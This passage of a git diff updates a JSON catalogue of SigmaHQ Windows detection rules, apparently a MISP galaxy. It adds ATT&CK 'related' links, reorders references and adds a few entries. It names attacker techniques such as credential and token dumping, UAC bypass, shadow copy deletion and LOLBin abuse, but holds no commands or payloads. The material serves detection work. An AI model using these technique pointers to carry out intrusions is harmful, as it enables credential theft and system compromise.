"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" ], "tags": [ @@ -31859,9 +40541,58 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", "value": "Atlassian Confluence CVE-2021-26084" }, + { + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_tracker.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", + "value": "Potential DLL Injection Or Execution Using Tracker.exe" + }, { "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", "meta": { @@ -31884,6 +40615,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "value": "Suspicious WMIC Execution - ProcessCallCreate" }, @@ -31900,9 +40640,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", - "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", + "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" ], "tags": [ @@ -31910,6 +40650,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "value": "Microsoft IIS Service Account Password Dumped" }, @@ -31934,6 +40683,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", "value": "Nimgrab File Download" }, @@ -31985,6 +40743,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", "value": "Procdump Evasion" }, @@ -32002,9 +40769,9 @@ "logsource.product": "windows", "refs": [ "https://youtu.be/5mqid-7zp8k?t=2481", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" ], "tags": [ @@ -32057,6 +40824,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "value": "Usage of Sysinternals Tools" }, @@ -32083,6 +40859,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "value": "Suspicious Schtasks Execution AppData Folder" }, @@ -32108,6 +40900,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", "value": "UAC Bypass Using Disk Cleanup" }, @@ -32124,9 +40925,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", "https://twitter.com/_felamos/status/1204705548668555264", "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" ], "tags": [ @@ -32134,6 +40935,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN" }, @@ -32150,8 +40960,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ @@ -32186,6 +40996,15 @@ "car.2013-05-002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "value": "MS Office Product Spawning Exe in User Dir" }, @@ -32214,6 +41033,15 @@ "car.2013-08-001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", "value": "Scheduled Task Creation" }, @@ -32255,8 +41083,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", "https://sourceforge.net/projects/mouselock/", + "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" ], "tags": [ @@ -32281,8 +41109,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/wusa.exe/", "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://www.echotrail.io/insights/search/wusa.exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" ], "tags": [ @@ -32313,6 +41141,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", "value": "Cmd Stream Redirection" }, @@ -32337,6 +41174,15 @@ "attack.t1528" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", "value": "Suspicious Office Token Search Via CLI" }, @@ -32353,8 +41199,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" ], "tags": [ @@ -32362,6 +41208,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "value": "Suspicious WebDav Client Execution" }, @@ -32401,8 +41256,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://support.anydesk.com/Automatic_Deployment", "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", + "https://support.anydesk.com/Automatic_Deployment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" ], "tags": [ @@ -32410,6 +41265,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "value": "AnyDesk Silent Installation" }, @@ -32426,8 +41290,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", "https://twitter.com/subTee/status/1216465628946563073", + "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" ], "tags": [ @@ -32462,6 +41326,22 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "value": "Remote PowerShell Session Host Process (WinRM)" }, @@ -32487,7 +41367,7 @@ ] }, "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "value": "DllRegisterServer Call From Non Rundll32" + "value": "Renamed Rundll32 Execution Via DllRegisterServer" }, { "description": "Detects commands that temporarily turn off Volume Snapshots", @@ -32534,6 +41414,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", "value": "Use of Mftrace.exe" }, @@ -32558,6 +41447,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", "value": "Suspicious Rundll32 Without Any CommandLine Params" }, @@ -32574,9 +41472,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/filip_dragovic/status/1590104354727436290", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", "https://twitter.com/filip_dragovic/status/1590052248260055041", + "https://twitter.com/filip_dragovic/status/1590104354727436290", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" ], "tags": "No established tags" @@ -32605,6 +41503,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", "value": "Process Dump via RdrLeakDiag.exe" }, @@ -32621,8 +41528,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" ], @@ -32631,6 +41538,15 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", "value": "Mustang Panda Dropper" }, @@ -32657,6 +41573,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", "value": "DumpMinitool Usage" }, @@ -32682,6 +41607,15 @@ "attack.t1059.006" ] }, + "related": [ + { + "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "value": "Suspicious File Characteristics Due to Missing Fields" }, @@ -32711,6 +41645,29 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", "value": "Maze Ransomware" }, @@ -32751,10 +41708,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://www.activecyber.us/activelabs/windows-uac-bypass", - "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", "https://twitter.com/ReaQta/status/1222548288731217921", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" ], "tags": [ @@ -32763,6 +41720,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "value": "Bypass UAC via WSReset.exe" }, @@ -32780,8 +41746,8 @@ "logsource.product": "windows", "refs": [ "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", - "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", + "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" ], "tags": [ @@ -32789,6 +41755,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74db3488-fd28-480a-95aa-b7af626de068", "value": "LockerGoga Ransomware" }, @@ -32815,6 +41790,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "899133d5-4d7c-4a7f-94ee-27355c879d90", "value": "Python Inline Command Execution" }, @@ -32859,8 +41843,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", "https://twitter.com/vysecurity/status/977198418354491392", + "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" ], "tags": [ @@ -32869,6 +41853,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "value": "Ping Hex IP" }, @@ -32885,8 +41878,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" ], "tags": [ @@ -32895,9 +41888,49 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", "value": "Schtasks Creation Or Modification With SYSTEM Privileges" }, + { + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "creation_date": "2018/09/03", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_powershell_base64_encoded_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "value": "Suspicious Encoded PowerShell Command Line" + }, { "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", "meta": { @@ -32919,6 +41952,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "value": "Conhost Spawned By Suspicious Parent Process" }, @@ -32947,6 +41989,22 @@ "attack.g0001" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "value": "ZxShell Malware" }, @@ -32963,7 +42021,7 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", + "Turla has used fsutil fsinfo drives to list connected drives.", "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" ], @@ -33020,6 +42078,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "value": "Lolbin Ssh.exe Use As Proxy" }, @@ -33036,8 +42103,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", "https://twitter.com/pabraeken/status/993298228840992768", + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" ], "tags": [ @@ -33047,6 +42114,22 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "value": "SQL Client Tools PowerShell Session Detection" }, @@ -33072,6 +42155,15 @@ "attack.t1574" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", "value": "DLL Execution Via Register-cimprovider.exe" }, @@ -33096,6 +42188,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "value": "Run PowerShell Script from ADS" }, @@ -33113,15 +42214,15 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", - "https://github.com/Neo23x0/Raccine#the-process", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://github.com/Neo23x0/Raccine#the-process", + "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" ], "tags": [ @@ -33131,6 +42232,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", "value": "Shadow Copies Deletion Using Operating Systems Utilities" }, @@ -33147,9 +42257,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" ], "tags": [ @@ -33173,9 +42283,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" ], "tags": [ @@ -33186,6 +42296,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "value": "Bitsadmin Download" }, @@ -33211,6 +42337,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", "value": "Data Compressed - rar.exe" }, @@ -33238,6 +42373,22 @@ "attack.t1134.003" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "value": "SharpImpersonation Execution" }, @@ -33286,6 +42437,15 @@ "attack.t1087.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" }, @@ -33310,6 +42470,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": 